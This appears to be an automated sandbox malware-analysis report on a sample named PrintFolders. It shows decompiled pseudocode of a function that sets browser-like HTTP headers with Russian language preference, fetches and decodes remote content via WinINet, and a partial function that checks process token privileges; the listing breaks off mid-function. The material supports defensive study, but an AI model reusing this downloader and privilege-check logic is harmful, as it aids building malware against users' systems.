Opcode ID: cdf5ef2873a73ee89aeb392416d28c2a8e100c1643c37962a50c484033c6f312
Instruction ID: 1e70075c2325eb26896e542e756e04c6963ea449c89895b1e211c5b43069dcbf
Opcode Fuzzy Hash: cdf5ef2873a73ee89aeb392416d28c2a8e100c1643c37962a50c484033c6f312
Instruction Fuzzy Hash: 76A15D32B001649FCF19EF68EC51BAE3BA1AB46314F54015EF811EB392CB39D942CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004019F0 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 103
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E004019F0(void* __ebx, void* __edi, void* __eflags, void* _a4) {
				char* _v8;
				char* _v12;
				char* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _v40;
				char* _v48;
				char _v56;
				void _v60;
				intOrPtr _v64;
				char* _v68;
				char* _v84;
				intOrPtr _v88;
				signed int _v92;
				void* _v96;
				void* _v124;
				char _v144;
				signed int _v152;
				void _v292;
				int _v296;
				long _v300;
				char* _v304;
				char _v320;
				signed int _v324;
				signed int _v328;
				short* _v332;
				char* _v336;
				signed int _v340;
				char* _v344;
				char* _v360;
				signed int _v364;
				char* _v368;
				char* _v384;
				void* _v456;
				intOrPtr* _v616;
				char _v636;
				signed int _v644;
				intOrPtr _v648;
				char* _v652;
				char* _v668;
				intOrPtr _v672;
				char* _v700;
				void* __esi;
				void* __ebp;
				signed int _t243;
				signed int _t244;
				int _t261;
				char* _t263;
				signed int _t268;
				signed int _t269;
				signed int _t276;
				char _t277;
				signed int _t282;
				signed int _t288;
				signed int _t289;
				short* _t296;
				signed int _t299;
				intOrPtr* _t302;
				signed int _t303;
				signed int _t305;
				short* _t309;
				signed int _t312;
				signed int _t314;
				signed int _t319;
				char* _t324;
				signed int _t331;
				signed int _t333;
				void* _t339;
				intOrPtr _t352;
				signed int _t357;
				char* _t358;
				void* _t366;
				signed int _t371;
				void* _t376;
				char* _t379;
				signed int _t387;
				signed int _t389;
				void* _t390;
				void* _t391;
				void* _t393;
				char* _t394;
				signed int _t395;
				void* _t397;
				intOrPtr _t398;
				void* _t400;
				void* _t401;
				char* _t410;
				intOrPtr* _t418;
				int _t422;
				short* _t429;
				void* _t436;
				char* _t438;
				char* _t441;
				intOrPtr* _t442;
				char _t456;
				char* _t458;
				char* _t465;
				signed int _t468;
				void* _t470;
				short* _t473;
				signed int _t476;
				char _t480;
				intOrPtr* _t482;
				intOrPtr _t484;
				signed int _t485;
				void* _t486;
				void* _t489;
				void* _t491;
				void* _t492;
				void* _t493;
				void* _t494;
				int _t495;
				short* _t496;
				signed int _t498;
				signed int _t500;
				signed int _t501;
				signed int _t502;
				void* _t504;
				intOrPtr* _t505;
				signed int _t506;
				void* _t509;
				char* _t510;
				void* _t511;
				void* _t512;
				void* _t513;
				void* _t514;
				intOrPtr _t515;
				void* _t517;
				void* _t518;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				void* _t525;
				signed int _t526;
				void* _t528;
				void* _t529;
				void* _t530;
				signed int _t531;
				void* _t532;
				void* _t534;
				void* _t535;

				_t388 = __ebx;
				_push(0xffffffff);
				_push(0x42c27d);
				_push( *[fs:0x0]);
				_t526 = _t525 - 0x24;
				_t243 =  *0x43d054; // 0x7bd02ead
				_t244 = _t243 ^ _t521;
				_v24 = _t244;
				_push(__edi);
				_push(_t244);
				 *[fs:0x0] =  &_v16;
				_t491 = _a4;
				_v48 = 0;
				_v32 = 0;
				_v28 = 0xf;
				_v48 = 0;
				E004026B0(__ebx,  &_v48, "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", 0x7d);
				_v8 = 0;
				_t248 =  >=  ? _v48 :  &_v48;
				HttpAddRequestHeadersA(_t491,  >=  ? _v48 :  &_v48, _v32, 0x20000000);
				E004026B0(__ebx,  &_v48, "Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", 0x28);
				_t252 =  >=  ? _v48 :  &_v48;
				HttpAddRequestHeadersA(_t491,  >=  ? _v48 :  &_v48, _v32, 0x20000000);
				E004026B0(__ebx,  &_v48, "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", 0x32);
				_t256 =  >=  ? _v48 :  &_v48;
				HttpAddRequestHeadersA(_t491,  >=  ? _v48 :  &_v48, _v32, 0x20000000);
				E004026B0(__ebx,  &_v48, "Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", 0x37);
				_t260 =  >=  ? _v48 :  &_v48;
				_t261 = HttpAddRequestHeadersA(_t491,  >=  ? _v48 :  &_v48, _v32, 0x20000000);
				_t468 = _v28;
				if(_t468 < 0x10) {
					L4:
					 *[fs:0x0] = _v16;
					_pop(_t492);
					_pop(_t509);
					return E0040EBBF(_t261, _t388, _v24 ^ _t521, _t468, _t492, _t509);
				} else {
					_t410 = _v48;
					_t468 = _t468 + 1;
					_t263 = _t410;
					if(_t468 < 0x1000) {
						L3:
						_push(_t468);
						_t261 = E0040EDFF(_t410);
						goto L4;
					} else {
						_t410 =  *(_t410 - 4);
						_t468 = _t468 + 0x23;
						if(_t263 - _t410 + 0xfffffffc > 0x1f) {
							E00413527(__ebx, _t468, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t521);
							_t522 = _t526;
							_push(0xffffffff);
							_push(0x42c2cb);
							_push( *[fs:0x0]);
							_t528 = _t526 - 0x170;
							_t268 =  *0x43d054; // 0x7bd02ead
							_t269 = _t268 ^ _t522;
							_v152 = _t269;
							_push(__ebx);
							_push(HttpAddRequestHeadersA);
							_push(_t491);
							_push(_t269);
							 *[fs:0x0] =  &_v144;
							_t510 = _t410;
							__eflags = _t510[0x28];
							_t493 = _v124;
							_v456 = _t493;
							if(__eflags != 0) {
								_v336 = _t510[0x34];
							} else {
								_t510[0x30] = 0x7800;
								_t387 = E0040EE0D(_t493, _t510, __eflags, 0x7800);
								_t528 = _t528 + 4;
								_t510[0x28] = _t387;
								_t510[0x34] = 0;
								_v336 = 0;
							}
							_v300 = 0;
							InternetSetFilePointer(_t493, 0, 0, 0, 0);
							while(1) {
								_t276 = InternetReadFile(_t493,  &(_t510[0x34][_t510[0x28]]), 0x3e8,  &_v300); // executed
								_t469 = _v300;
								_t389 = _t276;
								_t277 = _t510[0x30];
								_t510[0x34] =  &(_t510[0x34][_t469]);
								__eflags = _t277 - _t510[0x34] - 0x3e8;
								if(__eflags <= 0) {
									_t510[0x30] = _t277 + 0x7800;
									_t506 = E0040EE0D(_t493, _t510, __eflags, _t277 + 0x7800);
									__eflags =  &(_t510[0x34][1]);
									E004104C0(_t506, _t510[0x28],  &(_t510[0x34][1]));
									L0040EBCD(_t510[0x28]);
									_t469 = _v300;
									_t528 = _t528 + 0x14;
									_t510[0x28] = _t506;
									_t493 = _v332;
								}
								__eflags = _t389;
								if(_t389 == 0) {
									break;
								}
								__eflags = _t469;
								if(_t469 != 0) {
									continue;
								}
								break;
							}
							_v300 = 0x103;
							E00410B00(_t493,  &_v292, 0, 0x104);
							_t529 = _t528 + 0xc;
							_t282 = HttpQueryInfoA(_t493, 0x1d,  &_v292,  &_v300, 0);
							__eflags = _t282;
							if(_t282 == 0) {
								L38:
								_t510[0x34][_t510[0x28]] = 0;
								 *[fs:0x0] = _v20;
								_pop(_t494);
								_pop(_t511);
								_pop(_t390);
								__eflags = _v28 ^ _t522;
								return E0040EBBF(_t510[0x34] - _v336, _t390, _v28 ^ _t522, _t469, _t494, _t511);
							} else {
								_v328 = 0;
								_t288 =  &_v320;
								_v324 = 0;
								__imp__CoCreateInstance(_t288, 0, 1, 0x42e2c0,  &_v328);
								__eflags = _t288;
								if(_t288 < 0) {
									goto L38;
								} else {
									__eflags = _v328;
									if(_v328 == 0) {
										goto L38;
									} else {
										_t418 =  &_v292;
										_v360 = 0;
										_v344 = 0;
										_t470 = _t418 + 1;
										_v340 = 0xf;
										_v360 = 0;
										asm("o16 nop [eax+eax]");
										do {
											_t289 =  *_t418;
											_t418 = _t418 + 1;
											__eflags = _t289;
										} while (_t289 != 0);
										E004026B0(_t389,  &_v360,  &_v292, _t418 - _t470);
										_v12 = 0;
										_t391 = MultiByteToWideChar;
										_t422 =  &(_v344[1]);
										__eflags = _v340 - 0x10;
										_t293 =  >=  ? _v360 :  &_v360;
										_v296 = _t422;
										_t495 = MultiByteToWideChar(0, 0,  >=  ? _v360 :  &_v360, _t422, 0, 0);
										_t296 = E0040EE0D(_t495, _t510, __eflags,  ~(0 | __eflags > 0x00000000) | _t294 * 0x00000002);
										_t530 = _t529 + 4;
										_v332 = _t296;
										__eflags = _v340 - 0x10;
										_t428 =  >=  ? _v360 :  &_v360;
										_t496 = _t296;
										MultiByteToWideChar(0, 0,  >=  ? _v360 :  &_v360, _v296, _t496, _t495);
										_t429 = _t496;
										_v384 = 0;
										__eflags = 0;
										_v368 = 0;
										_v364 = 7;
										_v384 = 0;
										_t99 =  &(_t429[1]); // 0x2
										_t473 = _t99;
										do {
											_t299 =  *_t429;
											_t429 =  &(_t429[1]);
											__eflags = _t299;
										} while (_t299 != 0);
										E00402550(MultiByteToWideChar,  &_v384, _t496);
										L0040EBCD(_t496);
										_t531 = _t530 + 4;
										_v12 = 1;
										_t302 = _v328;
										__eflags = _v364 - 8;
										_t475 =  >=  ? _v384 :  &_v384;
										_t303 =  *((intOrPtr*)( *_t302 + 0x10))(_t302,  >=  ? _v384 :  &_v384, L"text",  &_v324, _t429 - _t473 >> 1);
										_v12 = 0;
										_t498 = _t303;
										_t476 = _v364;
										__eflags = _t476 - 8;
										if(_t476 < 8) {
											L25:
											_v12 = 0xffffffff;
											_t469 = _v340;
											_v368 = 0;
											_v364 = 7;
											_v384 = 0;
											__eflags = _t469 - 0x10;
											if(_t469 < 0x10) {
												L29:
												__eflags = _t498;
												if(_t498 >= 0) {
													__eflags = _v324;
													if(__eflags != 0) {
														_t393 = (_t510[0x34] - _v336) * 8 - _t510[0x34] - _v336;
														_t309 = E0040EE0D(_t498, _t510, __eflags, _t393);
														_t532 = _t531 + 4;
														_t436 = _t510[0x34] - _v336;
														_v296 = 0;
														_v304 = 0;
														_t499 =  *_v324;
														_v332 = _t309;
														_t469 = _v324;
														_t394 = _v336;
														_t312 =  *((intOrPtr*)( *_v324 + 0x10))(_v324, 0, _t436,  &(_t394[_t510[0x28]]), _t393, _t309, _t436,  &_v304,  &_v296, 0);
														__eflags = _t312;
														if(_t312 >= 0) {
															_t316 = _v296;
															_t480 = _t510[0x30];
															_t438 =  &(_t394[_v296]);
															__eflags = _t480 - _t438;
															if(__eflags > 0) {
																_t500 = _t510[0x28];
															} else {
																_t510[0x30] =  &(_t438[0x3e8]);
																_t500 = E0040EE0D(_t499, _t510, __eflags,  &(_t438[0x3e8]));
																E00401760(_t500, _t510[0x30], _t510[0x28], _t394);
																L0040EBCD(_t510[0x28]);
																_t480 = _t510[0x30];
																_t532 = _t532 + 0x10;
																_t316 = _v296;
																_t510[0x28] = _t500;
															}
															_t469 = _t480 - _t394;
															E00401760( &(_t394[_t500]), _t480 - _t394, _v332, _t316);
															_t532 = _t532 + 8;
															_t319 =  &(_t394[_v296]);
															__eflags = _t319;
															_t510[0x34] = _t319;
														}
														L0040EBCD(_v332);
														_t314 = _v324;
														 *((intOrPtr*)( *_t314 + 8))(_t314);
													}
												}
												_t305 = _v328;
												 *((intOrPtr*)( *_t305 + 8))(_t305);
												goto L38;
											} else {
												_t441 = _v360;
												_t469 = _t469 + 1;
												_t324 = _t441;
												__eflags = _t469 - 0x1000;
												if(_t469 < 0x1000) {
													L28:
													_push(_t469);
													E0040EDFF(_t441);
													_t531 = _t531 + 8;
													goto L29;
												} else {
													_t441 =  *(_t441 - 4);
													_t469 = _t469 + 0x23;
													__eflags = _t324 - _t441 + 0xfffffffc - 0x1f;
													if(__eflags > 0) {
														goto L39;
													} else {
														goto L28;
													}
												}
											}
										} else {
											_t465 = _v384;
											_t489 = 2 + _t476 * 2;
											_t379 = _t465;
											__eflags = _t489 - 0x1000;
											if(_t489 < 0x1000) {
												L24:
												_push(_t489);
												E0040EDFF(_t465);
												_t531 = _t531 + 8;
												goto L25;
											} else {
												_t441 =  *(_t465 - 4);
												_t469 = _t489 + 0x23;
												__eflags = _t379 - _t441 + 0xfffffffc - 0x1f;
												if(__eflags > 0) {
													L39:
													E00413527(_t391, _t469, __eflags);
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													_push(_t522);
													_t523 = _t531;
													_push(0xffffffff);
													_push(0x42c315);
													_push( *[fs:0x0]);
													_t534 = _t531 - 0x48;
													_t331 =  *0x43d054 ^ _t523;
													__eflags = _t331;
													_v644 = _t331;
													_push(_t391);
													_push(_t510);
													_push(_t498);
													_push(_t331);
													 *[fs:0x0] =  &_v636;
													_v700 = _t441;
													_t482 = _v616;
													_t442 = _t482;
													_v668 = 0;
													_v672 = _t482;
													_v652 = 0;
													_v648 = 0xf;
													_t512 = _t442 + 1;
													_v668 = 0;
													do {
														_t333 =  *_t442;
														_t442 = _t442 + 1;
														__eflags = _t333;
													} while (_t333 != 0);
													E004026B0(_t391,  &_v56, _t482, _t442 - _t512);
													_v16 = 0;
													_t395 = _v36;
													__eflags = _t395 - 0x10;
													_t513 = _v40;
													_t483 = _t513;
													_t446 =  >=  ? _v56 :  &_v56;
													_t501 = E00402890( >=  ? _v56 :  &_v56, _t513,  >=  ? _v56 :  &_v56, "http://", 7);
													_t535 = _t534 + 0xc;
													__eflags = _t501 - 0xffffffff;
													if(_t501 == 0xffffffff) {
														L45:
														__eflags = _v36 - 0x10;
														_t397 =  >=  ? _v56 :  &_v56;
														__eflags = _t513;
														if(_t513 == 0) {
															L48:
															_t502 = _t501 | 0xffffffff;
															__eflags = _t502;
														} else {
															_t501 = E00410A50(_t397, 0x2f, _t513);
															_t535 = _t535 + 0xc;
															__eflags = _t501;
															if(_t501 == 0) {
																goto L48;
															} else {
																_t502 = _t501 - _t397;
															}
														}
														__eflags = _t513 - _t502;
														_v84 = 0;
														_v68 = 0;
														_t448 =  <  ? _t513 : _t502;
														_v64 = 0xf;
														__eflags = _v36 - 0x10;
														_t337 =  >=  ? _v56 :  &_v56;
														_v84 = 0;
														E004026B0(_t397,  &_v84,  >=  ? _v56 :  &_v56,  <  ? _t513 : _t502);
														_v16 = 1;
														_t339 = _v40;
														__eflags = _t339 - _t502;
														_t503 =  <  ? _t339 : _t502;
														__eflags = _v36 - 0x10;
														_t451 =  >=  ? _v56 :  &_v56;
														_t340 = _t339 - ( <  ? _t339 : _t502);
														_v40 = _t339 - ( <  ? _t339 : _t502);
														E004104C0( >=  ? _v56 :  &_v56,  &(( >=  ? _v56 :  &_v56)[ <  ? _t339 : _t502]), _t339 - ( <  ? _t339 : _t502) + 1);
														_t398 = _v88;
														_v92 = 0;
														E00413604(_t398 + 0x44, 0x104, _v60, 0x103);
														_t535 = _t535 + 0x1c;
														asm("sbb eax, eax");
														_t513 = InternetOpenA( *(_t398 + 0xc),  ~( *(_t398 + 0x38)) & 0x00000003,  *(_t398 + 0x38), 0, 0);
														_v96 = _t513;
														__eflags = _t513;
														if(_t513 != 0) {
															_v60 = 1;
															InternetSetOptionA(_t513, 0x41,  &_v60, 4);
															__eflags = _v64 - 0x10;
															_t365 =  >=  ? _v84 :  &_v84;
															_t366 = InternetConnectA(_t513,  >=  ? _v84 :  &_v84, 0x50,  *(_t398 + 0x3c),  *(_t398 + 0x40), 3, 0, 1);
															_t505 = InternetCloseHandle;
															_t401 = _t366;
															__eflags = _t401;
															if(_t401 != 0) {
																__eflags = _v36 - 0x10;
																_t460 =  >=  ? _v56 :  &_v56;
																_t517 = HttpOpenRequestA(_t401, "GET",  >=  ? _v56 :  &_v56, 0, 0, 0, 0x80400000, 1);
																__eflags = _t517;
																if(__eflags != 0) {
																	E004019F0(_t401, InternetCloseHandle, __eflags, _t517);
																	_t371 = HttpSendRequestA(_t517, 0, 0, 0, 0);
																	__eflags = _t371;
																	if(_t371 != 0) {
																		_push(_t517);
																		L6();
																		_v92 = _t371;
																	}
																	 *_t505(_t517);
																}
																 *_t505(_t401);
																_t513 = _v96;
															}
															 *_t505(_t513);
														}
														_t484 = _v64;
														__eflags = _v92;
														_t395 = 0 | _v92 > 0x00000000;
														__eflags = _t484 - 0x10;
														if(_t484 < 0x10) {
															L61:
															_t485 = _v36;
															_v68 = 0;
															_v64 = 0xf;
															_v84 = 0;
															__eflags = _t485 - 0x10;
															if(_t485 < 0x10) {
																L65:
																 *[fs:0x0] = _v24;
																_pop(_t504);
																_pop(_t514);
																_pop(_t400);
																__eflags = _v32 ^ _t523;
																return E0040EBBF(_t395, _t400, _v32 ^ _t523, _t485, _t504, _t514);
															} else {
																_t456 = _v56;
																_t485 = _t485 + 1;
																_t352 = _t456;
																__eflags = _t485 - 0x1000;
																if(_t485 < 0x1000) {
																	L64:
																	_push(_t485);
																	E0040EDFF(_t456);
																	goto L65;
																} else {
																	_t456 =  *((intOrPtr*)(_t456 - 4));
																	_t485 = _t485 + 0x23;
																	__eflags = _t352 - _t456 + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		goto L67;
																	} else {
																		goto L64;
																	}
																}
															}
														} else {
															_t458 = _v84;
															_t486 = _t484 + 1;
															_t358 = _t458;
															__eflags = _t486 - 0x1000;
															if(_t486 < 0x1000) {
																L60:
																_push(_t486);
																E0040EDFF(_t458);
																_t535 = _t535 + 8;
																goto L61;
															} else {
																_t456 =  *((intOrPtr*)(_t458 - 4));
																_t485 = _t486 + 0x23;
																__eflags = _t358 - _t456 + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	goto L67;
																} else {
																	goto L60;
																}
															}
														}
													} else {
														__eflags = _t513 - _t501;
														if(_t513 < _t501) {
															E004027F0(_t446, _t483);
															L67:
															E00413527(_t395, _t485, __eflags);
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															_push(_t523);
															_push(_t513);
															_t515 = _t456;
															_t357 =  *(_t515 + 0x2c);
															 *(_t515 + 0x34) = 0;
															__eflags = _t357;
															if(_t357 != 0) {
																_t357 = L0040EBCD(_t357);
																 *(_t515 + 0x2c) = 0;
															}
															_push(_v8);
															L40();
															return _t357;
														} else {
															_t376 = _t513 - _t501;
															__eflags = _t376 - 7;
															_t488 =  <  ? _t376 : 7;
															__eflags = _t395 - 0x10;
															_t463 =  >=  ? _v56 :  &_v56;
															_t518 = _t513 - 7;
															_t464 =  &(( >=  ? _v56 :  &_v56)[_t501]);
															_v40 = _t518;
															__eflags = _t518 - _t501 + 1;
															E004104C0( &(( >=  ? _v56 :  &_v56)[_t501]),  &(( &(( >=  ? _v56 :  &_v56)[_t501]))[ <  ? _t376 : 7]), _t518 - _t501 + 1);
															_t513 = _v40;
															_t535 = _t535 + 0xc;
															goto L45;
														}
													}
												} else {
													goto L24;
												}
											}
										}
									}
								}
							}
						} else {
							goto L3;
						}
					}
				}
			}

0x004019f0
0x004019f3
0x004019f5
0x00401a00
0x00401a01
0x00401a04
0x00401a09
0x00401a0b
0x00401a0f
0x00401a10
0x00401a14
0x00401a1a
0x00401a22
0x00401a2e
0x00401a35
0x00401a3c
0x00401a40
0x00401a45
0x00401a59
0x00401a67
0x00401a73
0x00401a87
0x00401a8d
0x00401a99
0x00401aad
0x00401ab3
0x00401abf
0x00401ad3
0x00401ad9
0x00401adb
0x00401ae1
0x00401b0b
0x00401b0e
0x00401b16
0x00401b17
0x00401b25
0x00401ae3
0x00401ae3
0x00401ae6
0x00401ae7
0x00401aef
0x00401b01
0x00401b01
0x00401b03
0x00000000
0x00401af1
0x00401af1
0x00401af4
0x00401aff
0x00401b28
0x00401b2d
0x00401b2e
0x00401b2f
0x00401b30
0x00401b31
0x00401b33
0x00401b35
0x00401b40
0x00401b41
0x00401b47
0x00401b4c
0x00401b4e
0x00401b51
0x00401b52
0x00401b53
0x00401b54
0x00401b58
0x00401b5e
0x00401b60
0x00401b64
0x00401b67
0x00401b6d
0x00401b9c
0x00401b6f
0x00401b74
0x00401b7b
0x00401b80
0x00401b83
0x00401b86
0x00401b8d
0x00401b8d
0x00401bab
0x00401bb5
0x00401bc0
0x00401bd4
0x00401bda
0x00401be0
0x00401be2
0x00401be7
0x00401bed
0x00401bf3
0x00401bfb
0x00401c06
0x00401c08
0x00401c0e
0x00401c16
0x00401c1b
0x00401c21
0x00401c24
0x00401c27
0x00401c27
0x00401c2d
0x00401c2f
0x00000000
0x00000000
0x00401c31
0x00401c33
0x00000000
0x00000000
0x00000000
0x00401c33
0x00401c40
0x00401c4d
0x00401c52
0x00401c68
0x00401c6e
0x00401c70
0x00401fd5
0x00401fdb
0x00401feb
0x00401ff3
0x00401ff4
0x00401ff5
0x00401ff9
0x00402003
0x00401c76
0x00401c7c
0x00401c90
0x00401c96
0x00401ca1
0x00401ca7
0x00401ca9
0x00000000
0x00401caf
0x00401caf
0x00401cb6
0x00000000
0x00401cbc
0x00401cbc
0x00401cc2
0x00401ccc
0x00401cd6
0x00401cd9
0x00401ce3
0x00401cea
0x00401cf0
0x00401cf0
0x00401cf2
0x00401cf3
0x00401cf3
0x00401d07
0x00401d0c
0x00401d1f
0x00401d25
0x00401d26
0x00401d2f
0x00401d3e
0x00401d48
0x00401d59
0x00401d5e
0x00401d61
0x00401d67
0x00401d74
0x00401d7c
0x00401d8a
0x00401d8c
0x00401d8e
0x00401d98
0x00401d9a
0x00401da4
0x00401dae
0x00401db5
0x00401db5
0x00401dc0
0x00401dc0
0x00401dc3
0x00401dc6
0x00401dc6
0x00401dd7
0x00401ddd
0x00401de2
0x00401de5
0x00401def
0x00401dfb
0x00401e03
0x00401e13
0x00401e16
0x00401e1a
0x00401e1c
0x00401e22
0x00401e25
0x00401e5c
0x00401e5e
0x00401e65
0x00401e6b
0x00401e75
0x00401e7f
0x00401e86
0x00401e89
0x00401eba
0x00401eba
0x00401ebc
0x00401ec2
0x00401ec9
0x00401edf
0x00401ee2
0x00401eed
0x00401ef3
0x00401ef9
0x00401f05
0x00401f0f
0x00401f1e
0x00401f25
0x00401f31
0x00401f3e
0x00401f41
0x00401f43
0x00401f45
0x00401f4b
0x00401f4e
0x00401f51
0x00401f53
0x00401f8d
0x00401f55
0x00401f5c
0x00401f67
0x00401f6f
0x00401f77
0x00401f7c
0x00401f7f
0x00401f82
0x00401f88
0x00401f88
0x00401f97
0x00401f9c
0x00401fa7
0x00401faa
0x00401faa
0x00401fac
0x00401fac
0x00401fb5
0x00401fba
0x00401fc6
0x00401fc6
0x00401ec9
0x00401fc9
0x00401fd2
0x00000000
0x00401e8b
0x00401e8b
0x00401e91
0x00401e92
0x00401e94
0x00401e9a
0x00401eb0
0x00401eb0
0x00401eb2
0x00401eb7
0x00000000
0x00401e9c
0x00401e9c
0x00401e9f
0x00401ea7
0x00401eaa
0x00000000
0x00000000
0x00000000
0x00000000
0x00401eaa
0x00401e9a
0x00401e27
0x00401e27
0x00401e2d
0x00401e34
0x00401e36
0x00401e3c
0x00401e52
0x00401e52
0x00401e54
0x00401e59
0x00000000
0x00401e3e
0x00401e3e
0x00401e41
0x00401e49
0x00401e4c
0x00402006
0x00402006
0x0040200b
0x0040200c
0x0040200d
0x0040200e
0x0040200f
0x00402010
0x00402011
0x00402013
0x00402015
0x00402020
0x00402021
0x00402029
0x00402029
0x0040202b
0x0040202e
0x0040202f
0x00402030
0x00402031
0x00402035
0x0040203b
0x0040203e
0x00402041
0x00402043
0x0040204a
0x0040204d
0x00402054
0x0040205b
0x0040205e
0x00402062
0x00402062
0x00402064
0x00402065
0x00402065
0x00402070
0x00402075
0x0040207f
0x00402082
0x00402085
0x00402088
0x0040208a
0x0040209b
0x0040209d
0x004020a0
0x004020a3
0x004020e0
0x004020e0
0x004020e7
0x004020eb
0x004020ed
0x00402105
0x00402105
0x00402105
0x004020ef
0x004020f8
0x004020fa
0x004020fd
0x004020ff
0x00000000
0x00402101
0x00402101
0x00402101
0x004020ff
0x00402108
0x0040210a
0x00402113
0x0040211a
0x0040211d
0x00402124
0x0040212c
0x00402134
0x00402138
0x0040213d
0x00402144
0x00402147
0x00402149
0x0040214c
0x00402150
0x00402154
0x00402156
0x00402160
0x00402165
0x0040216b
0x00402183
0x0040218b
0x00402195
0x004021a4
0x004021a6
0x004021a9
0x004021ab
0x004021b6
0x004021c1
0x004021c7
0x004021d0
0x004021e2
0x004021e8
0x004021ee
0x004021f0
0x004021f2
0x004021f4
0x004021fd
0x00402219
0x0040221b
0x0040221d
0x00402220
0x0040222e
0x00402234
0x00402236
0x0040223b
0x0040223c
0x00402241
0x00402241
0x00402245
0x00402245
0x00402248
0x0040224a
0x0040224a
0x0040224e
0x0040224e
0x00402250
0x00402255
0x00402258
0x0040225b
0x0040225e
0x00402288
0x00402288
0x0040228b
0x00402292
0x00402299
0x0040229d
0x004022a0
0x004022ca
0x004022cf
0x004022d7
0x004022d8
0x004022d9
0x004022dd
0x004022e7
0x004022a2
0x004022a2
0x004022a5
0x004022a6
0x004022a8
0x004022ae
0x004022c0
0x004022c0
0x004022c2
0x00000000
0x004022b0
0x004022b0
0x004022b3
0x004022bb
0x004022be
0x00000000
0x00000000
0x00000000
0x00000000
0x004022be
0x004022ae
0x00402260
0x00402260
0x00402263
0x00402264
0x00402266
0x0040226c
0x0040227e
0x0040227e
0x00402280
0x00402285
0x00000000
0x0040226e
0x0040226e
0x00402271
0x00402279
0x0040227c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040227c
0x0040226c
0x004020a5
0x004020a5
0x004020a7
0x004022ea
0x004022ef
0x004022ef
0x004022f4
0x004022f5
0x004022f6
0x004022f7
0x004022f8
0x004022f9
0x004022fa
0x004022fb
0x004022fc
0x004022fd
0x004022fe
0x004022ff
0x00402300
0x00402303
0x00402304
0x00402306
0x00402309
0x00402310
0x00402312
0x00402315
0x0040231d
0x0040231d
0x00402324
0x00402329
0x00402330
0x004020ad
0x004020b2
0x004020b9
0x004020bb
0x004020be
0x004020c1
0x004020c5
0x004020c7
0x004020c9
0x004020ce
0x004020d5
0x004020da
0x004020dd
0x00000000
0x004020dd
0x004020a7
0x00000000
0x00000000
0x00000000
0x00401e4c
0x00401e3c
0x00401e25
0x00401cb6
0x00401ca9
0x00000000
0x00000000
0x00000000
0x00401aff
0x00401aef

APIs

HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401A67
HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401A8D

Part of subcall function 004026B0: Concurrency::cancel_current_task.LIBCPMT ref: 004027E3

HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401AB3
HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401AD9

Strings

text, xrefs: 00401E0C
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 00401A91
GET, xrefs: 0040220D
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401A29
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 00401AB7
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 00401A6B

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: HeadersHttpRequest$Concurrency::cancel_current_task
String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$text
API String ID: 2146599340-3782612381
Opcode ID: fcad180c4c3fe079648477ce6e35f16694a51aef3eb89b63915f875012574e84
Instruction ID: 621c8db50826d68fbf5915584c3f353caeca61d3b6748355fd6bd9a3799d1aaf
Opcode Fuzzy Hash: fcad180c4c3fe079648477ce6e35f16694a51aef3eb89b63915f875012574e84
Instruction Fuzzy Hash: EF316F31E00109EBEB15DFA9CC85FEEBBB9EB48714F60C02AE121761C0D779A544CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004065E0 Relevance: 12.1, APIs: 8, Instructions: 67
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004065E0(void* __esi) {
				signed int _v8;
				void _v84;
				short _v88;
				struct _SID_IDENTIFIER_AUTHORITY _v92;
				long _v96;
				void* _v100;
				void* _v104;
				signed int _t16;
				int _t25;
				int _t30;
				void* _t35;
				void* _t40;
				void* _t41;
				void* _t44;
				signed int _t45;

				_t42 = __esi;
				_t16 =  *0x43d054; // 0x7bd02ead
				_v8 = _t16 ^ _t45;
				_v92.Value = 0;
				_v88 = 0x500;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v100) == 0) {
					L3:
					return E0040EBBF(0, _t35, _v8 ^ _t45, _t40, _t41, _t42);
				} else {
					_t25 = GetTokenInformation(_v100, 1,  &_v84, 0x4c,  &_v96); // executed
					_push(_v100);
					if(_t25 != 0) {
						CloseHandle();
						if(AllocateAndInitializeSid( &_v92, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v104) == 0) {
							goto L3;
						} else {
							_push(__esi);
